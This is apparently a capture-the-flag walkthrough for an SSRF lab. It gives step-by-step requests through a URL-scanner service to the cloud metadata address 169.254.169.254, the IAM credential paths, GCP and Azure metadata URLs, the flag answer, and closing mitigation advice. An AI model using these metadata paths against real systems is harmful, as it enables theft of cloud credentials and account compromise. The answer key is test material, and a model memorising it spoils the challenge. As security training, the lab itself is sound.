Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.

1. Access the URL scanner: Navigate to http://<target-ip> to access the SecureScan Pro service (hosted on port 80)
2. Test normal functionality: Try scanning a legitimate external URL like https://example.com
3. Observe the response: Note the detailed information returned (headers, status, content preview)
4. Analyze the request pattern: Understand how the service processes and displays URL content

Test AWS Metadata Endpoints

1. Test AWS metadata access: Try scanning the well-known AWS metadata endpoints

Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/

2. Discover AWS metadata service: Try the well-known AWS metadata endpoint

http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/

1. Access metadata root: Start with the basic metadata endpoint

URL: http://169.254.169.254/latest/meta-data/

2. Explore available endpoints: You'll see a list like:

ami-id
hostname
instance-id
instance-type
local-hostname
local-ipv4
public-hostname
public-ipv4
security-groups
iam/

3. Focus on IAM endpoints: The most sensitive data is usually in IAM credentials

1. Access IAM security credentials: Navigate to the IAM endpoints

Step 1: http://169.254.169.254/latest/meta-data/iam/
Step 2: http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step 3: http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole

2. Extract the credentials: The final endpoint contains the flag embedded in the JSON response
3. Flag location: Look for the 'Challenge_Flag' field in the IAM credentials JSON
4. Flag format: UUID format (117c287d-efb6-4e42-9292-51e180367855)

Expected JSON Response:
{
  "Code" : "Success",
  "LastUpdated" : "2025-08-06T12:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "AKIA...",
  "SecretAccessKey" : "wJalrXUtnFEMI...",
  "Token" : "AQoDYXdzEJr...",
  "Expiration" : "2025-08-06T18:00:00Z",
  "Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
  "Note" : "SSRF Challenge Completed!"
}

Method 1: Direct Path Access

http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole

Method 2: Explore Other Metadata

http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groups

Method 3: Real-World AWS Metadata

http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)

• IAM credential theft: AWS metadata exposes temporary security credentials for the instance role
• Instance information: Detailed system information about the EC2 instance
• User data exposure: Startup scripts and configuration data
• Security group info: Network security configuration details
• Cross-service access: Credentials can be used to access other AWS services
• Privilege escalation: Stolen IAM credentials may have broader permissions than expected

• Complete AWS account compromise: IAM credentials can access S3, RDS, Lambda, and other services
• Data exfiltration: Access to private S3 buckets and databases
• Infrastructure manipulation: Creating/deleting resources, modifying security groups
• Lateral movement: Using credentials to access other EC2 instances or services
• Cost manipulation: Launching expensive resources or crypto mining instances
• Compliance violations: Access to sensitive data without authorization

• Block metadata endpoints: Explicitly block access to 169.254.169.254 in applications
• Use IMDSv2: Configure instances to require token-based metadata requests
• Principle of least privilege: Minimize IAM role permissions on EC2 instances
• Network segmentation: Isolate applications from sensitive internal services
• Input validation: Whitelist allowed domains and IP ranges
• WAF rules: Block requests to internal IP ranges and metadata endpoints
• Monitoring: Alert on unusual metadata service access patterns

• Vulnerability type: Server-Side Request Forgery (SSRF) targeting AWS metadata simulation
• Root cause: No URL validation or filtering in the scanning service
• Attack method: Direct request to simulated AWS metadata endpoints
• Target service: AWS metadata service at 169.254.169.254 (intercepted and simulated)
• Flag location: Embedded in IAM security credentials JSON response
• Educational value: Demonstrates real-world cloud security attack vectors

This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.